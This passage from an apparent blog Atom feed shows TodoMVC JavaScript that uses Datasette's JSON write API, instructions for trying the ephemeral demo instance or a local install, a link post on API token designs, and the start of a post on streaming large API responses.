  &lt;span class="pl-c"&gt;// Ensure a table exists with this name&lt;/span&gt;
  &lt;span class="pl-k"&gt;let&lt;/span&gt; &lt;span class="pl-s1"&gt;self&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-smi"&gt;this&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
  &lt;span class="pl-s1"&gt;self&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;_dbName&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;`todo_&lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-s1"&gt;name&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;`&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
  &lt;span class="pl-en"&gt;fetch&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s"&gt;"https://latest.datasette.io/ephemeral/-/create"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
    &lt;span class="pl-c1"&gt;method&lt;/span&gt;: &lt;span class="pl-s"&gt;"POST"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-c1"&gt;mode&lt;/span&gt;: &lt;span class="pl-s"&gt;"cors"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-c1"&gt;headers&lt;/span&gt;: &lt;span class="pl-kos"&gt;{&lt;/span&gt;
      &lt;span class="pl-c1"&gt;Authorization&lt;/span&gt;: &lt;span class="pl-s"&gt;`Bearer &lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-c1"&gt;TOKEN&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;`&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
      &lt;span class="pl-s"&gt;"Content-Type"&lt;/span&gt;: &lt;span class="pl-s"&gt;"application/json"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-c1"&gt;body&lt;/span&gt;: &lt;span class="pl-c1"&gt;JSON&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;stringify&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;{&lt;/span&gt;
      &lt;span class="pl-c1"&gt;table&lt;/span&gt;: &lt;span class="pl-s1"&gt;self&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;_dbName&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
      &lt;span class="pl-c1"&gt;columns&lt;/span&gt;: &lt;span class="pl-kos"&gt;[&lt;/span&gt;
        &lt;span class="pl-kos"&gt;{&lt;/span&gt;&lt;span class="pl-c1"&gt;name&lt;/span&gt;: &lt;span class="pl-s"&gt;"id"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-c1"&gt;type&lt;/span&gt;: &lt;span class="pl-s"&gt;"integer"&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
        &lt;span class="pl-kos"&gt;{&lt;/span&gt;&lt;span class="pl-c1"&gt;name&lt;/span&gt;: &lt;span class="pl-s"&gt;"title"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-c1"&gt;type&lt;/span&gt;: &lt;span class="pl-s"&gt;"text"&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
        &lt;span class="pl-kos"&gt;{&lt;/span&gt;&lt;span class="pl-c1"&gt;name&lt;/span&gt;: &lt;span class="pl-s"&gt;"completed"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-c1"&gt;type&lt;/span&gt;: &lt;span class="pl-s"&gt;"integer"&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
      &lt;span class="pl-kos"&gt;]&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
      &lt;span class="pl-c1"&gt;pk&lt;/span&gt;: &lt;span class="pl-s"&gt;"id"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
  &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;then&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-k"&gt;function&lt;/span&gt; &lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;r&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
    &lt;span class="pl-s1"&gt;callback&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;call&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-smi"&gt;this&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-kos"&gt;[&lt;/span&gt;&lt;span class="pl-kos"&gt;]&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
  &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Most applications would run against a table that has already been created, but this felt like a good opportunity to show what table creation looks like.&lt;/p&gt;
&lt;p&gt;Note that the table is being created using &lt;code&gt;/ephemeral/-/create&lt;/code&gt; - this endpoint that lets you create tables in the ephemeral database, which is a temporary database that drops every table after 15 minutes. I built the &lt;a href="https://datasette.io/plugins/datasette-ephemeral-tables"&gt;datasette-ephemeral-tables&lt;/a&gt; plugin to make this possible.&lt;/p&gt;
&lt;p&gt;Here's the code which is called when a new TODO list item is created or updated:&lt;/p&gt;
&lt;div class="highlight highlight-source-js"&gt;&lt;pre&gt;&lt;span class="pl-v"&gt;Store&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;prototype&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;save&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-k"&gt;function&lt;/span&gt; &lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;updateData&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-s1"&gt;callback&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-s1"&gt;id&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
&lt;span class="pl-c"&gt;// {title, completed}&lt;/span&gt;
&lt;span class="pl-s1"&gt;callback&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;callback&lt;/span&gt; &lt;span class="pl-c1"&gt;||&lt;/span&gt; &lt;span class="pl-k"&gt;function&lt;/span&gt; &lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
&lt;span class="pl-k"&gt;var&lt;/span&gt; &lt;span class="pl-s1"&gt;table&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-smi"&gt;this&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;_dbName&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;

&lt;span class="pl-c"&gt;// If an ID was actually given, find the item and update each property&lt;/span&gt;
&lt;span class="pl-k"&gt;if&lt;/span&gt; &lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;id&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
  &lt;span class="pl-en"&gt;fetch&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;
    &lt;span class="pl-s"&gt;`https://latest.datasette.io/ephemeral/&lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-s1"&gt;table&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;/&lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-s1"&gt;id&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;/-/update`&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-kos"&gt;{&lt;/span&gt;
      &lt;span class="pl-c1"&gt;method&lt;/span&gt;: &lt;span class="pl-s"&gt;"POST"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
      &lt;span class="pl-c1"&gt;mode&lt;/span&gt;: &lt;span class="pl-s"&gt;"cors"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
      &lt;span class="pl-c1"&gt;headers&lt;/span&gt;: &lt;span class="pl-kos"&gt;{&lt;/span&gt;
        &lt;span class="pl-c1"&gt;Authorization&lt;/span&gt;: &lt;span class="pl-s"&gt;`Bearer &lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-c1"&gt;TOKEN&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;`&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
        &lt;span class="pl-s"&gt;"Content-Type"&lt;/span&gt;: &lt;span class="pl-s"&gt;"application/json"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
      &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
      &lt;span class="pl-c1"&gt;body&lt;/span&gt;: &lt;span class="pl-c1"&gt;JSON&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;stringify&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;{&lt;/span&gt;&lt;span class="pl-c1"&gt;update&lt;/span&gt;: &lt;span class="pl-s1"&gt;updateData&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-kos"&gt;}&lt;/span&gt;
  &lt;span class="pl-kos"&gt;)&lt;/span&gt;
    &lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;then&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;r&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-c1"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="pl-s1"&gt;r&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;json&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;
    &lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;then&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;data&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-c1"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
      &lt;span class="pl-s1"&gt;callback&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;call&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;self&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-s1"&gt;data&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
    &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
&lt;span class="pl-kos"&gt;}&lt;/span&gt; &lt;span class="pl-k"&gt;else&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
  &lt;span class="pl-c"&gt;// Save it and store ID&lt;/span&gt;
  &lt;span class="pl-en"&gt;fetch&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s"&gt;`https://latest.datasette.io/ephemeral/&lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-s1"&gt;table&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;/-/insert`&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
    &lt;span class="pl-c1"&gt;method&lt;/span&gt;: &lt;span class="pl-s"&gt;"POST"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-c1"&gt;mode&lt;/span&gt;: &lt;span class="pl-s"&gt;"cors"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-c1"&gt;headers&lt;/span&gt;: &lt;span class="pl-kos"&gt;{&lt;/span&gt;
      &lt;span class="pl-c1"&gt;Authorization&lt;/span&gt;: &lt;span class="pl-s"&gt;`Bearer &lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-c1"&gt;TOKEN&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;`&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
      &lt;span class="pl-s"&gt;"Content-Type"&lt;/span&gt;: &lt;span class="pl-s"&gt;"application/json"&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-c1"&gt;body&lt;/span&gt;: &lt;span class="pl-c1"&gt;JSON&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;stringify&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;{&lt;/span&gt;
      &lt;span class="pl-c1"&gt;row&lt;/span&gt;: &lt;span class="pl-s1"&gt;updateData&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
    &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
  &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;
    &lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;then&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;r&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-c1"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="pl-s1"&gt;r&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;json&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;
    &lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;then&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;data&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-c1"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
      &lt;span class="pl-k"&gt;let&lt;/span&gt; &lt;span class="pl-s1"&gt;row&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;data&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;rows&lt;/span&gt;&lt;span class="pl-kos"&gt;[&lt;/span&gt;&lt;span class="pl-c1"&gt;0&lt;/span&gt;&lt;span class="pl-kos"&gt;]&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;callback&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;call&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;self&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt; &lt;span class="pl-s1"&gt;row&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
    &lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
&lt;span class="pl-kos"&gt;}&lt;/span&gt;
&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;TodoMVC passes an &lt;code&gt;id&lt;/code&gt; if a record is being updated - which this code uses as a sign that the &lt;code&gt;...table/row-id/-/update&lt;/code&gt; API should be called (see &lt;a href="https://docs.datasette.io/en/latest/json_api.html#updating-a-row"&gt;update API documentation&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;If the row doen't have an ID it is inserted using &lt;code&gt;table/-/insert&lt;/code&gt;, this time using the &lt;code&gt;"row":&lt;/code&gt; key because we are only inserting a single row.&lt;/p&gt;
&lt;p&gt;The hardest part of getting this to work was ensuring Datasette's &lt;a href="https://docs.datasette.io/en/latest/json_api.html#json-api"&gt;CORS mode&lt;/a&gt; worked correctly for writes. I had to add a new &lt;code&gt;Access-Control-Allow-Methods&lt;/code&gt; header, which I shipped in &lt;a href="https://docs.datasette.io/en/latest/changelog.html#a1-2022-12-01"&gt;Datasette 1.0a1&lt;/a&gt; (see &lt;a href="https://github.com/simonw/datasette/issues/1922"&gt;issue #1922&lt;/a&gt;).&lt;/p&gt;
&lt;h4&gt;Try the ephemeral hosted API&lt;/h4&gt;
&lt;p&gt;I built the &lt;a href="https://datasette.io/plugins/datasette-ephemeral-tables"&gt;datasette-ephemeral-tables&lt;/a&gt; plugin because I wanted to provide a demo instance of the write API that anyone could try out without needing to install Datasette themselves - but that wouldn't leave me responsible for taking care of their data or cleaning up any of their mess.&lt;/p&gt;
&lt;p&gt;You're welcome to experiment with the API using the &lt;a href="https://latest.datasette.io/"&gt;https://latest.datasette.io/&lt;/a&gt; demo instance.&lt;/p&gt;
&lt;p&gt;First, you'll need to sign in as a root user. You can do that (no password required) using the button &lt;a href="https://latest.datasette.io/login-as-root"&gt;on this page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Once signed in you can view the ephemeral database (which isn't visible to anonymous users) here:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://latest.datasette.io/ephemeral"&gt;https://latest.datasette.io/ephemeral&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;You can use the API explorer to try out the different write APIs against it here:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://latest.datasette.io/-/api"&gt;https://latest.datasette.io/-/api&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;And you can create your own signed token for accessing the API on this page:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://latest.datasette.io/-/create-token"&gt;https://latest.datasette.io/-/create-token&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2022/create-token.jpg" alt="The Create an API token page lets you create a token that expires after a set number of hours - you can then copy that token to your clipboard" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;The TodoMVC application described above also uses the &lt;code&gt;ephemeral&lt;/code&gt; database, so you may see a &lt;code&gt;todo_todos-vanillajs&lt;/code&gt; table appear there if anyone is playing with that demo.&lt;/p&gt;
&lt;h4 id="your-machine"&gt;Or run this on your own machine&lt;/h4&gt;
&lt;p&gt;You can install the latest Datasette alpha like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pip install datasette==1.0a1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then create a database and sign in as the &lt;code&gt;root&lt;/code&gt; user in order to gain access to the API:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;datasette demo.db --create --root
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Click on the link it outputs to sign in as the root user, then visit the API explorer to start trying out the API:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://127.0.0.1:8001/-/api"&gt;http://127.0.0.1:8001/-/api&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2022/api-explorer.jpg" alt="The API explorer interface has tools for sending GET and POST requests, plus a list of API endpoints" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;The API explorer works without a token at all, using your existing browser cookies.&lt;/p&gt;
&lt;p&gt;If you want to try the API using &lt;code&gt;curl&lt;/code&gt; or similar you can use this page to create a new signed API token for the &lt;code&gt;root&lt;/code&gt; user:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://127.0.0.1:8001/-/create-token"&gt;http://127.0.0.1:8001/-/create-token&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This token will become invalid if you restart the server, unless you fix the &lt;code&gt;DATASETTE_SECRET&lt;/code&gt; environment variable to a stable string before you start the server:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export DATASETTE_SECRET=$(
  python3 -c 'print(__import__("secrets").token_hex(16))'
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Check the &lt;a href="https://docs.datasette.io/en/latest/json_api.html#the-json-write-api"&gt;Write API documentation&lt;/a&gt; for more details.&lt;/p&gt;
&lt;h4&gt;What's next?&lt;/h4&gt;
&lt;p&gt;If you have feedback on these APIs, &lt;em&gt;now is the time&lt;/em&gt; to share it! I'm hoping to ship Datasette 1.0 at the start of 2023, after which these APIs will be considered stable for hopefully a long time to come.&lt;/p&gt;
&lt;p&gt;If you have thoughts or feedback (or questions) join us on the &lt;a href="https://datasette.io/discord"&gt;Datasette Discord&lt;/a&gt;. You can also file issue comments against &lt;a href="https://github.com/simonw/issues"&gt;Datasette&lt;/a&gt; itself.&lt;/p&gt;
&lt;p&gt;My priority for the next 1.0 alpha is to bake in a small number of backwards incompatible changes to other aspects of Datasette's JSON API that I've been hoping to include in 1.0 for a while.&lt;/p&gt;
&lt;p&gt;I'm also going to be rolling out API support to my &lt;a href="https://datasette.cloud/"&gt;Datasette Cloud&lt;/a&gt; preview users. If you're interested in trying that out you can &lt;a href="https://www.datasette.cloud/preview/"&gt;request access here&lt;/a&gt;.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="json"/><category term="projects"/><category term="datasette"/></entry><entry><title>API Tokens: A Tedious Survey</title><link href="https://simonwillison.net/2021/Aug/25/api-tokens-a-tedious-survey/#atom-tag" rel="alternate"/><published>2021-08-25T00:12:13+00:00</published><updated>2021-08-25T00:12:13+00:00</updated><id>https://simonwillison.net/2021/Aug/25/api-tokens-a-tedious-survey/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://fly.io/blog/api-tokens-a-tedious-survey/"&gt;API Tokens: A Tedious Survey&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Thomas Ptacek reviews different approaches to implementing secure API tokens, from simple random strings stored in a database through various categories of signed token to exotic formats like Macaroons and Biscuits, both new to me.&lt;/p&gt;

&lt;p&gt;Macaroons carry a signed list of restrictions with them, but combine it with a mechanism where a client can add their own additional restrictions, sign the combination and pass the token on to someone else.&lt;/p&gt;

&lt;p&gt;Biscuits are similar, but “embed Datalog programs to evaluate whether a token allows an operation”.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/fly"&gt;fly&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="security"/><category term="thomas-ptacek"/><category term="fly"/></entry><entry><title>Notes on streaming large API responses</title><link href="https://simonwillison.net/2021/Jun/25/streaming-large-api-responses/#atom-tag" rel="alternate"/><published>2021-06-25T16:26:49+00:00</published><updated>2021-06-25T16:26:49+00:00</updated><id>https://simonwillison.net/2021/Jun/25/streaming-large-api-responses/#atom-tag</id><summary type="html">
    &lt;p&gt;I started &lt;a href="https://twitter.com/simonw/status/1405554676993433605"&gt;a Twitter conversation&lt;/a&gt; last week about API endpoints that stream large amounts of data as an alternative to APIs that return 100 results at a time and require clients to paginate through all of the pages in order to retrieve all of the data:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p dir="ltr" lang="en"&gt;Any unexpected downsides to offering streaming HTTP API endpoints that serve up eg 100,000 JSON objects in a go rather than asking users to paginate 100 at a time over 1,000 requests, assuming efficient implementation of that streaming endpoint?&lt;/p&gt;— Simon Willison (@simonw) &lt;a href="https://twitter.com/simonw/status/1405554676993433605?ref_src=twsrc%5Etfw"&gt;June 17, 2021&lt;/a&gt;
&lt;/blockquote&gt;
&lt;p&gt;I got a ton of great replies. I tried to tie them together in a thread attached to the tweet, but I'm also going to synthesize them into some thoughts here.&lt;/p&gt;
&lt;h4&gt;Bulk exporting data&lt;/h4&gt;
&lt;p&gt;The more time I spend with APIs, especially with regard to my &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; and &lt;a href="https://simonwillison.net/2020/Nov/14/personal-data-warehouses/"&gt;Dogsheep&lt;/a&gt; projects, the more I realize that my favourite APIs are the ones that let you extract &lt;em&gt;all&lt;/em&gt; of your data as quickly and easily as possible.&lt;/p&gt;
&lt;p&gt;There are generally three ways an API might provide this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Click an "export everything" button, then wait for a while for an email to show up with a link to a downloadable zip file. This isn't really an API, in particular since it's usually hard if not impossible to automate that initial "click", but it's still better than nothing. Google's &lt;a href="https://takeout.google.com/"&gt;Takeout&lt;/a&gt; is one notable implementation of this pattern.&lt;/li&gt;
&lt;li&gt;Provide a JSON API which allows users to paginate through their data. This is a very common pattern, although it can run into difficulties: what happens if new data is added while you are paginating through the original data, for example? Some systems only allow access to the first N pages too, for performance reasons.&lt;/li&gt;
&lt;li&gt;Providing a single HTTP endpoint you can hit that will return ALL of your data - potentially dozens or hundreds of MBs of it - in one go.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It's that last option that I'm interested in talking about today.&lt;/p&gt;
&lt;h4&gt;Efficiently streaming data&lt;/h4&gt;
&lt;p&gt;It used to be that most web engineers would quickly discount the idea of an API endpoint that streams out an unlimited number of rows. HTTP requests should be served as quickly as possible! Anything more than a couple of seconds spent processing a request is a red flag that something should be reconsidered.&lt;/p&gt;
